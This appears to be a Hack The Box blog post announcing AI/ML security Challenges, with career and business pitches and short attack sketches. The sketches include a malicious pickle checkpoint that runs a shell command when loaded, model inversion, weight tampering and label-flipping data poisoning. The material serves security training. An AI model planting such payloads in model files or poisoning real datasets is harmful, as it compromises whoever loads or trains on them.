Red Teaming
JXoaT, Jul 18, 2024
As part of Hack The Box's (HTB) mission to provide our community with relevant content and stay on top of up-and-coming threats, we are thrilled to announce a new Challenge category focused on AI and ML!
You see AI in your daily life, whether it’s spicing up an essay with GrammarlyGo or setting up a site with the Wix AI website builder. There is an inevitable gravity pulling everyone into contact with these technologies.
The first thing I think is: “How does this tech work, and what are the current ways to exploit it?”
You will find new Challenges on the HTB Labs Platform that give you a place to practice your knowledge of AI exploits, carving out a place for you to grow your curiosity. What will these Challenges teach you? And how will upskilling in this security specialty help impact your career or business?
Let’s dig into that now.
Challenges have collectively helped us explore and communicate areas of technology in a more direct fashion. AI/ML is a fresh category, and there are few places where you can practice the intricacies of individual attacks.
That is something we wish to showcase within this new category. We have used space-themed Challenges to explore the diversity of methods that security pillars like OWASP and MITRE have shed light on.
OWASP has a Top 10 for both LLM Applications and Machine Learning Security. Each provides essential guidance on understanding the top security risks associated with its respective technology.
MITRE is a household name in security for their matrices that define adversarial techniques throughout the lifecycle of an attack. In 2021, MITRE released ATLAS, a matrix that analyzes threats and vulnerabilities specific to AI systems.
Hack The Box has steadily been mapping and creating content that aligns with the methods covered in the guides referenced above.
We suggest utilizing all of them while taking a shot at the Challenges below!
For these particular Challenges we focus on:
Manipulating widely utilized open-source frameworks like PyTorch and TensorFlow to perform attacks (see the deserialization sketch after this list).
Understanding model inversion, which allows attackers to exploit the patterns an ML model has learned from its training data, using gradient methods to reconstruct and make sense of that information (see the inversion sketch below).
Attempting model poisoning to trick the ML model itself by introducing malicious updates or modifications, which can lead it to miscategorize the information it hands back to the user (see the weight-tampering sketch below).
Utilizing data poisoning to inject false or misleading data points into the dataset, causing the model to learn incorrect patterns that lead to degraded performance or specific incorrect outputs (see the label-flipping sketch below).
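To make these concrete, here are a few minimal sketches. First, framework manipulation: one well-known risk with PyTorch is that model checkpoints are pickle-based, so deserializing an untrusted file can execute arbitrary code. The filename and payload below are placeholders for illustration, not taken from any specific Challenge.

```python
# Illustrative sketch: why loading untrusted PyTorch checkpoints is risky.
# torch.load() is built on pickle, and pickle can run code while
# deserializing. The filename and payload here are placeholders.
import pickle

class MaliciousCheckpoint:
    def __reduce__(self):
        import os
        # Whatever is returned here gets called during unpickling.
        return (os.system, ("echo pwned > /tmp/proof",))

with open("model.pt", "wb") as f:
    pickle.dump(MaliciousCheckpoint(), f)

# A victim calling torch.load("model.pt") without weights_only=True would
# run the payload during unpickling, even if the load itself then fails.
```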
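For model inversion, a common gradient-based approach is to optimize an input until the target model assigns it maximal confidence for a chosen class, recovering something the model "remembers" from training. This is a minimal sketch: the tiny stand-in model, class index, and hyperparameters are assumptions, not the setup used in the Challenges.

```python
# Minimal gradient-based model inversion sketch (PyTorch).
# The stand-in model, class index, and step count are illustrative.
import torch
import torch.nn as nn

model = nn.Sequential(nn.Flatten(), nn.Linear(28 * 28, 10))  # stand-in target
model.eval()

target_class = 3
x = torch.zeros(1, 1, 28, 28, requires_grad=True)  # start from a blank input
optimizer = torch.optim.Adam([x], lr=0.1)

for _ in range(200):
    optimizer.zero_grad()
    logits = model(x)
    loss = -logits[0, target_class]  # maximize the target class score
    loss.backward()
    optimizer.step()
    x.data.clamp_(0, 1)  # keep the reconstruction in a valid pixel range

# x is now an input the model strongly associates with the target class
reconstruction = x.detach()
```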
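Model poisoning can be as blunt as tampering directly with a trained model's weights. A hedged weight-tampering sketch, with a toy linear classifier standing in for a real model:

```python
# Minimal model-poisoning sketch: tampering with trained weights so the
# model miscategorizes what it hands back. The toy model is illustrative.
import torch
import torch.nn as nn

model = nn.Linear(4, 3)  # stand-in for a trained 3-class classifier

with torch.no_grad():
    # A crude "malicious modification": inflate one output bias so class 0
    # dominates every prediction.
    model.bias[0] += 100.0

x = torch.randn(8, 4)
print(model(x).argmax(dim=1))  # now predicts class 0 for every input
```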
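And for data poisoning, the classic label-flipping example: relabel a fraction of one class so the model learns the wrong association. The flip_labels helper and the 20% ratio below are hypothetical, written only to illustrate the idea.

```python
# Minimal data-poisoning sketch via label flipping. The flip_labels helper
# and the poisoning ratio are hypothetical, for illustration only.
import random

def flip_labels(dataset, target_label, poison_label, ratio=0.2):
    """Relabel a fraction of one class so training associates its
    features with the wrong class."""
    poisoned = []
    for features, label in dataset:
        if label == target_label and random.random() < ratio:
            label = poison_label  # the injected misleading data point
        poisoned.append((features, label))
    return poisoned

# e.g. teach the model that 20% of class-7 samples are really class 1:
# train_set = flip_labels(train_set, target_label=7, poison_label=1)
```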
Our goal is to encourage users to discover ways to deploy their understanding of these techniques to bypass, manipulate, and reconfigure model data, and to enjoy time well spent navigating each Challenge with curiosity. Log on to the HTB Labs Platform and solve them all today!
As attacks grow against models and against the companies incorporating them into products, so will the need for professionals who can challenge and harden the security of these applications.
Why is that a good thing? As we've said countless times before, if something is new, it likely isn't that secure. That works to your advantage.
And that’s why upskilling in AI security opens new doors for your career development. You'll not only become a highly sought-after source of unique knowledge by acquiring these skills, but you'll also be part of a rapidly expanding specialty across various industries.
It's important to remember that this is a specialty field. Previous experience in offensive and defensive security is required. The roles that exist tend to lean towards more senior positions, but they aren't limited to them.
Additionally, a strong background in languages like Python and R, along with an understanding of common frameworks, is a boon.
Here are a few roles and requirements to give you a good idea of what’s out there:
If you want to dive straight into testing the stability of AI/ML applications, you can also find bug bounty platforms looking to grow into this space. This way, you can test the skills you employed through these Challenges on real-world targets.
The explicit need for bug bounty hunters focused on this area of expertise has led to the rise of platforms like huntr that merge web exploitation with knowledge of AI models.
We asked huntr why they think learning practical AI/ML vulnerability exploitation, and our Challenges, are relevant:
"HTB's challenges are a great way to dive into AI/ML security. They focus on adversarial attacks, which are crucial for understanding model robustness. At huntr, we deal with practical AI vulnerabilities, so the skills you gain from HTB will help you tackle real-world issues effectively." - Marcello Salvati, Threat Researcher at Protect AI
We want to offer you a way to become familiar with new techniques, and a curiosity today can lead to a career tomorrow! It is important to stay up to date on what's out there now.
Any use of AI comes with potential risks, especially as providers are still working out the kinks.
Despite organizational policies, over 40% of employees use generative AI, yet only 6% of organizations offer comprehensive AI training to all staff.
As companies and their employees embrace AI—both directly and indirectly via AI-enabled products—they will need processes and capabilities to mitigate risks and gauge potential implications for security and regulatory compliance.
60% of organizations take longer than four days to resolve security issues. Unpreparedness in the face of AI attacks increases not only the time to remediate an attack but also its relative cost to the organization.
AI/ML Challenges within Dedicated Labs enhance teams' familiarity with these technologies and security techniques, improving their understanding of AI/ML attacks and enabling them to effectively secure AI and ML within organizations.
Consistent practice and training on AI can be key to reducing detection and escalation costs in data breaches, which average $1.58 million, and preventing disruption to revenue operations, which can average $1.3 million in losses.
All existing business customers can access the new Challenge category on Dedicated Labs within the HTB Enterprise Platform.
To get started, assign AI/ML Challenges to your team’s practice Space. Check out the below step-by-step video on how to assign Challenges to your team.